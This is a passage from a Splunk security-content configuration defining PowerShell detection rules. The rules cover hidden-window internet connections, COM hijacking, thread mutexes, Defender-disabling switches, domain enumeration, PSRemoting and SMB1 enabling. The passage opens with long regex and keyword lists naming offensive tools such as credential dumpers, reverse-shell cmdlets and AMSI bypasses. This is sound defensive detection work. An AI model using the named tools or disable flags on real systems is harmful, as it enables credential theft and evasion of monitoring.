"(?i)Add-Exfiltration|Add-Persistence|Add-RegBackdoor|Add-ScrnSaveBackdoor|Check-VM|Do-Exfiltration|Enabled-DuplicateToken|Exploit-Jboss|Find-Fruit|Find-GPOLocation|Find-TrustedDocuments|Get-ApplicationHost|Get-ChromeDump|Get-ClipboardContents|Get-FoxDump|Get-GPPPassword|Get-IndexedItem|Get-Keystrokes|LSASecret|Get-PassHash|Get-RegAlwaysInstallElevated|Get-RegAutoLogon|Get-RickAstley|Get-Screenshot|Get-SecurityPackages|Get-ServiceFilePermission|Get-ServicePermission|Get-ServiceUnquoted|Get-SiteListPassword|Get-System|Get-TimedScreenshot|Get-UnattendedInstallFile|Get-Unconstrained|Get-VaultCredential|Get-VulnAutoRun|Get-VulnSchTask|Gupt-Backdoor|HTTP-Login|Install-SSP|Install-ServiceBinary|Invoke-ACLScanner|Invoke-ADSBackdoor|Invoke-ARPScan|Invoke-AllChecks|Invoke-BackdoorLNK|Invoke-BypassUAC|Invoke-CredentialInjection|Invoke-DCSync|Invoke-DllInjection|Invoke-DowngradeAccount|Invoke-EgressCheck|Invoke-Inveigh|Invoke-InveighRelay|Invoke-Mimikittenz|Invoke-NetRipper|Invoke-NinjaCopy|Invoke-PSInject|Invoke-Paranoia|Invoke-PortScan|Invoke-PoshRat|Invoke-PostExfil|Invoke-PowerDump|Invoke-PowerShellTCP|Invoke-PsExec|Invoke-PsUaCme|Invoke-ReflectivePEInjection|Invoke-ReverseDNSLookup|Invoke-RunAs|Invoke-SMBScanner|Invoke-SSHCommand|Invoke-Service|Invoke-Shellcode|Invoke-Tater|Invoke-ThunderStruck|Invoke-Token|Invoke-UserHunter|Invoke-VoiceTroll|Invoke-WScriptBypassUAC|Invoke-WinEnum|MailRaider|New-HoneyHash|Out-Minidump|Port-Scan|PowerBreach|PowerUp|PowerView|Remove-Update|Set-MacAttribute|Set-Wallpaper|Show-TargetScreen|Start-CaptureServer|VolumeShadowCopyTools|NEEEEWWW|(Computer|User)Property|CachedRDPConnection|get-net\S+|invoke-\S+hunter|Install-Service|get-\S+(credent|password)|remoteps|Kerberos.*(policy|ticket)|netfirewall|Uninstall-Windows|Verb\s+Runas|AmsiBypass|nishang|Invoke-Interceptor|EXEonRemote|NetworkRelay|PowerShelludp|PowerShellIcmp|CreateShortcut|copy-vss|invoke-dll|invoke-mass|out-shortcut|Invoke-ShellCommand"),1,0) | eval base64 = 
if(match(lower(ScriptBlockText),"frombase64"), "4", 0) | eval empire=if(match(lower(ScriptBlockText),"system.net.webclient") AND match(lower(ScriptBlockText), "frombase64string") ,5,0) | eval mimikatz=if(match(lower(ScriptBlockText),"mimikatz") OR match(lower(ScriptBlockText), "-dumpcr") OR match(lower(ScriptBlockText), "SEKURLSA::Pth") OR match(lower(ScriptBlockText), "kerberos::ptt") OR match(lower(ScriptBlockText), "kerberos::golden") ,5,0) | eval iex=if(match(ScriptBlockText, "(?i)iex|invoke-expression"),2,0) | eval webclient=if(match(lower(ScriptBlockText),"http") OR match(lower(ScriptBlockText),"web(client|request)") OR match(lower(ScriptBlockText),"socket") OR match(lower(ScriptBlockText),"download(file|string)") OR match(lower(ScriptBlockText),"bitstransfer") OR match(lower(ScriptBlockText),"internetexplorer.application") OR match(lower(ScriptBlockText),"xmlhttp"),5,0) | eval get = if(match(lower(ScriptBlockText),"get-"), "1", 0) | eval rundll32 = if(match(lower(ScriptBlockText),"rundll32"), "4", 0) | eval suspkeywrd=if(match(ScriptBlockText, "(?i)(bitstransfer|mimik|metasp|AssemblyBuilderAccess|Reflection\.Assembly|shellcode|injection|cnvert|shell\.application|start-process|Rc4ByteStream|System\.Security\.Cryptography|lsass\.exe|localadmin|LastLoggedOn|hijack|BackupPrivilege|ngrok|comsvcs|backdoor|brute.?force|Port.?Scan|Exfiltration|exploit|DisableRealtimeMonitoring|beacon)"),1,0) | eval syswow64 = if(match(lower(ScriptBlockText),"syswow64"), "3", 0) | eval httplocal = if(match(lower(ScriptBlockText),"http://127.0.0.1"), "4", 0) | eval reflection = if(match(lower(ScriptBlockText),"reflection"), "1", 0) | eval invokewmi=if(match(lower(ScriptBlockText), "(?i)(wmiobject|WMIMethod|RemoteWMI|PowerShellWmi|wmicommand)"),5,0) | eval downgrade=if(match(ScriptBlockText, "(?i)([-]ve*r*s*i*o*n*\s+2)") OR match(lower(ScriptBlockText),"powershell -version"),3,0) | eval compressed=if(match(ScriptBlockText, 
"(?i)GZipStream|::Decompress|IO.Compression|write-zip|(expand|compress)-Archive"),5,0) | eval invokecmd = if(match(lower(ScriptBlockText),"invoke-command"), "4", 0) | addtotals fieldname=Score DoIt, enccom, suspcmdlet, suspkeywrd, compressed, downgrade, mimikatz, iex, empire, rundll32, webclient, syswow64, httplocal, reflection, invokewmi, invokecmd, base64, get | stats values(Score) by UserID, Computer, DoIt, enccom, compressed, downgrade, iex, mimikatz, rundll32, empire, webclient, syswow64, httplocal, reflection, invokewmi, invokecmd, base64, get, suspcmdlet, suspkeywrd | rename Computer as dest, UserID as user | `powershell_4104_hunting_filter` [ESCU - PowerShell - Connect To Internet With Hidden Window - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic identifies PowerShell commands utilizing the WindowStyle parameter to hide the window on the compromised endpoint. This combination of command-line options is suspicious because it is overriding the default PowerShell execution policy, attempts to hide its activity from the user, and connects to the Internet. Removed in this version of the query is New-Object. The analytic identifies all variations of WindowStyle, as PowerShell allows the ability to shorten the parameter. For example w, win, windowsty and so forth. In addition, through our research it was identified that PowerShell will interpret different command switch types beyond the hyphen. We have added endash, emdash, horizontal bar, and forward slash. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following hunting analytic identifies PowerShell commands utilizing the WindowStyle parameter to hide the window on the compromised endpoint. 
This combination of command-line options is suspicious because it is overriding the default PowerShell execution policy, attempts to hide its activity from the user, and connects to the Internet. Removed in this version of the query is New-Object. The analytic identifies all variations of WindowStyle, as PowerShell allows the ability to shorten the parameter. For example w, win, windowsty and so forth. In addition, through our research it was identified that PowerShell will interpret different command switch types beyond the hyphen. We have added endash, emdash, horizontal bar, and forward slash. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legitimate process can have this combination of command-line options, but it's not common. 
action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell - Connect To Internet With Hidden Window - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AgentTesla", "HAFNIUM Group", "Hermetic Wiper", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Malicious PowerShell", "Data Destruction", "Log4Shell CVE-2021-44228"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell - Connect To Internet With Hidden Window - Rule action.correlationsearch.annotations = {"analytic_story": ["AgentTesla", "HAFNIUM Group", "Hermetic Wiper", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Malicious PowerShell", "Data Destruction", "Log4Shell CVE-2021-44228"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-44228"], "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` by Processes.user Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name Processes.dest Processes.process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | 
where match(process,"(?i)[\-|\/|||]w(in*d*o*w*s*t*y*l*e*)*\s+[^-]") | `powershell___connect_to_internet_with_hidden_window_filter` [ESCU - Powershell COM Hijacking InprocServer32 Modification - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell ScriptBlock Logging to identify a script that is attempting to modify or add a component object model to inprocserver32 path within the registry. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.015", "T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell ScriptBlock Logging to identify a script that is attempting to modify or add a component object model to inprocserver32 path within the registry. action.escu.how_to_implement = The following analytic requires PowerShell operational logs to be imported. Modify the PowerShell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = False positives will be present if any scripts are adding to inprocserver32. Filter as needed. action.escu.creation_date = 2022-09-26 action.escu.modification_date = 2022-09-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell COM Hijacking InprocServer32 Modification - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell"] action.risk = 1 action.risk.param._risk_message = A PowerShell script has been identified with InProcServer32 within the script code on $Computer$. 
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell COM Hijacking InprocServer32 Modification - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.015", "T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell ScriptBlock Logging to identify a script that is attempting to modify or add a component object model to inprocserver32 path within the registry. action.notable.param.rule_title = Powershell COM Hijacking InprocServer32 Modification action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*Software\\Classes\\CLSID\\*\\InProcServer32*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_com_hijacking_inprocserver32_modification_filter` [ESCU - Powershell Creating Thread Mutex - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is using the `mutex` function. 
This function is commonly seen in some obfuscated PowerShell scripts to make sure that only one instance of there process is running on a compromise machine. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1027", "T1027.005", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is using the `mutex` function. This function is commonly seen in some obfuscated PowerShell scripts to make sure that only one instance of there process is running on a compromise machine. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = powershell developer may used this function in their script for instance checking too. 
action.escu.creation_date = 2022-05-02 action.escu.modification_date = 2022-05-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Creating Thread Mutex - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell"] action.risk = 1 action.risk.param._risk_message = A suspicious powershell script contains Thread Mutex in $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 40}, {"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Creating Thread Mutex - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1027", "T1027.005", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is using the `mutex` function. This function is commonly seen in some obfuscated PowerShell scripts to make sure that only one instance of there process is running on a compromise machine. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. 
action.notable.param.rule_title = Powershell Creating Thread Mutex
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*Threading.Mutex*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_creating_thread_mutex_filter`

[ESCU - Powershell Disable Security Monitoring - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search identifies a registry modification that disables Windows Defender real-time behavior monitoring. This event or technique is commonly seen in RATs, bots, or Trojans to disable AV and evade detection.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search identifies a registry modification that disables Windows Defender real-time behavior monitoring. This event or technique is commonly seen in RATs, bots, or Trojans to disable AV and evade detection.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited false positives. However, tune based on scripts that may perform this action.
action.escu.creation_date = 2022-07-15
action.escu.modification_date = 2022-07-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Powershell Disable Security Monitoring - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware", "Revil Ransomware"]
action.risk = 1
action.risk.param._risk_message = Windows Defender Real-time Behavior Monitoring disabled on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Powershell Disable Security Monitoring - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Revil Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search identifies a registry modification that disables Windows Defender real-time behavior monitoring. This event or technique is commonly seen in RATs, bots, or Trojans to disable AV and evade detection.
action.notable.param.rule_title = Powershell Disable Security Monitoring
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process="*set-mppreference*" AND Processes.process IN ("*disablerealtimemonitoring*","*disableioavprotection*","*disableintrusionpreventionsystem*","*disablescriptscanning*","*disableblockatfirstseen*","*DisableBehaviorMonitoring*","*drtm *","*dioavp *","*dscrptsc *","*dbaf *","*dbm *") by Processes.dest Processes.user Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_disable_security_monitoring_filter`

[ESCU - PowerShell Domain Enumeration - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies specific PowerShell modules typically used to enumerate an organization's domain or users. \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies specific PowerShell modules typically used to enumerate an organization's domain or users. \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = It is possible there will be false positives, filter as needed.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - PowerShell Domain Enumeration - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Hermetic Wiper", "Malicious PowerShell", "CISA AA23-347A", "Data Destruction"]
action.risk = 1
action.risk.param._risk_message = A suspicious powershell script contains domain enumeration command in $ScriptBlockText$ with EventCode $EventCode$ in host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - PowerShell Domain Enumeration - Rule
action.correlationsearch.annotations = {"analytic_story": ["Hermetic Wiper", "Malicious PowerShell", "CISA AA23-347A", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies specific PowerShell modules typically used to enumerate an organization's domain or users. \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.notable.param.rule_title = PowerShell Domain Enumeration
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText IN (*get-netdomaintrust*, *get-netforesttrust*, *get-addomain*, *get-adgroupmember*, *get-domainuser*) | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_domain_enumeration_filter`

[ESCU - PowerShell Enable PowerShell Remoting - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic utilizes PowerShell Script Block Logging (EventCode 4104) to identify use of the Enable-PSRemoting cmdlet. This cmdlet allows users to enable PowerShell remoting on a local or remote computer, which allows other computers to run commands on the target computer. The ability to remotely execute commands can be abused by attackers to take control of compromised systems and pivot to other systems on the network. By detecting use of the Enable-PSRemoting cmdlet via script block logging, this analytic can help organizations identify potential malicious activity related to attackers attempting to gain remote control of compromised systems.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This analytic utilizes PowerShell Script Block Logging (EventCode 4104) to identify use of the Enable-PSRemoting cmdlet. This cmdlet allows users to enable PowerShell remoting on a local or remote computer, which allows other computers to run commands on the target computer. The ability to remotely execute commands can be abused by attackers to take control of compromised systems and pivot to other systems on the network. By detecting use of the Enable-PSRemoting cmdlet via script block logging, this analytic can help organizations identify potential malicious activity related to attackers attempting to gain remote control of compromised systems.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Note that false positives may occur due to the use of the Enable-PSRemoting cmdlet by legitimate users, such as system administrators. It is recommended to apply appropriate filters as needed to minimize the number of false positives.
action.escu.creation_date = 2023-03-22
action.escu.modification_date = 2023-03-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - PowerShell Enable PowerShell Remoting - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Malicious PowerShell"]
action.risk = 1
action.risk.param._risk_message = PowerShell was identified running an Invoke-PSremoting on $Computer$.
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - PowerShell Enable PowerShell Remoting - Rule
action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText="*Enable-PSRemoting*" | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `powershell_enable_powershell_remoting_filter`

[ESCU - Powershell Enable SMB1Protocol Feature - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects suspicious enabling of SMB1Protocol through `powershell.exe`. This technique was seen in some ransomware (like reddot), which enables the SMB share to perform lateral movement and encrypt other files within the compromised network.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027", "T1027.005"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search detects suspicious enabling of SMB1Protocol through `powershell.exe`. This technique was seen in some ransomware (like reddot), which enables the SMB share to perform lateral movement and encrypt other files within the compromised network.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting PowerShell logs from your endpoints. Make sure the registry settings needed to log this event are enabled.
action.escu.known_false_positives = A network operator may enable or disable this Windows feature.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Powershell Enable SMB1Protocol Feature - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Ransomware", "Malicious PowerShell", "Hermetic Wiper", "Data Destruction"]
action.risk = 1
action.risk.param._risk_message = Powershell Enable SMB1Protocol Feature on $Computer$
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Powershell Enable SMB1Protocol Feature - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Malicious PowerShell", "Hermetic Wiper", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027", "T1027.005"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects suspicious enabling of SMB1Protocol through `powershell.exe`. This technique was seen in some ransomware (like reddot), which enables the SMB share to perform lateral movement and encrypt other files within the compromised network.
action.notable.param.rule_title = Powershell Enable SMB1Protocol Feature
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*Enable-WindowsOptionalFeature*" ScriptBlockText = "*SMB1Protocol*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_enable_smb1protocol_feature_filter`

[ESCU - Powershell Execute COM Object - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects COM CLSID execution through PowerShell. This technique was seen in several adversaries and malware such as the Conti ransomware, which has a feature to execute commands using a COM object. A network operator may use this technique in some cases, but it is a good indicator that an application is trying to gain privilege escalation or bypass UAC.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.015", "T1546", "T1059.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search detects COM CLSID execution through PowerShell. This technique was seen in several adversaries and malware such as the Conti ransomware, which has a feature to execute commands using a COM object. A network operator may use this technique in some cases, but it is a good indicator that an application is trying to gain privilege escalation or bypass UAC.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.
action.escu.known_false_positives = A network operator may use this command.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Powershell Execute COM Object - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Ransomware", "Malicious PowerShell", "Hermetic Wiper", "Data Destruction"]
action.risk = 1
action.risk.param._risk_message = A suspicious powershell script contains COM CLSID command in $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 5}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Powershell Execute COM Object - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Malicious PowerShell", "Hermetic Wiper", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.015", "T1546", "T1059.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
